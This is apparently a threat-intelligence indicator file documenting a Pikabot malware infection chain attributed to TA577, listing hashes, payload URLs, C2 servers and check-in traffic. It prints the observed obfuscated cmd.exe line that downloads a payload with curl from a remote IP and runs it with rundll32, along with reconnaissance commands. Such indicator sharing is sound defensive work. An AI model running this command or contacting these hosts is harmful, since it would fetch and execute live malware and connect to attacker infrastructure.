Pikabot_02.11.2023.txt

02.11.2023 | Pikabot | TA577 | 1.1.15-ghost

*************************************************

.url https://jannaty-charity.org/ce/?1337
.zip a3fb2d055359ac0f65ab1a97a3bf7b9d77f3cfac42cd3d70215a692bde4aa974
.js fabeeeb0e55aaf4366e8af7207bd250731270a89abafb2a39d02719ce45476b2
.dll 1c125a10c33d862e6179b6827131e1aac587d23f1b7be0dbcb32571d70e34de4

*************************************************

zip > js > curl > dll

wscript.exe C:\Users\Admin\AppData\Local\Temp\Cmejuzqk.js

cmd.exe /c XBMr || eChO XBMr & pIng XBMr || cuRl http://216.128.185.35/mdh/gunne -o %TMp%\XBMr.sct & pIng -n 4 XBMr || ruNdll32 %TMP%\XBMr.sct, Crash & ExiT n6CfRCPHUEsvYLL

pIng XBMr 

pIng -n 4 XBMr

ruNdll32 C:\Users\Admin\AppData\Local\Temp\XBMr.sct, Crash

SearchProtocolHost.exe

whoami.exe /all

ipconfig.exe /all

netstat.exe -aon

*************************************************

.dll distro

http://216.128.185.35/mdh/gunne
http://45.77.72.139/WVIeUje/overi

*************************************************

c2's

51.195.232.97:13782
188.26.127.4:13785
15.235.202.109:2226
51.68.147.114:2083
15.235.47.206:13783
15.235.45.155:2221
51.79.143.215:13783

HTTPS Checking Traffic 

https://51.195.232.97:13782/clotheshorsesFieldman/9jotehkMFmvUEZ?superlied=1PtNdih&JewfishesNameless=gSMq1lY8mA
https://188.26.127.4:13785/clotheshorsesFieldman/9jotehkMFmvUEZ?superlied=1PtNdih&JewfishesNameless=gSMq1lY8mA
https://15.235.202.109:2226/clotheshorsesFieldman/9jotehkMFmvUEZ?superlied=1PtNdih&JewfishesNameless=gSMq1lY8mA
https://51.68.147.114:2083/clotheshorsesFieldman/9jotehkMFmvUEZ?superlied=1PtNdih&JewfishesNameless=gSMq1lY8mA
https://15.235.47.206:13783/clotheshorsesFieldman/9jotehkMFmvUEZ?superlied=1PtNdih&JewfishesNameless=gSMq1lY8mA
https://15.235.45.155:2221/clotheshorsesFieldman/9jotehkMFmvUEZ?superlied=1PtNdih&JewfishesNameless=gSMq1lY8mA
https://51.79.143.215:13783/clotheshorsesFieldman/9jotehkMFmvUEZ?superlied=1PtNdih&JewfishesNameless=gSMq1lY8mA
https://51.195.232.97:13782/clotheshorsesFieldman/9jotehkMFmvUEZ?superlied=1PtNdih&JewfishesNameless=gSMq1lY8mA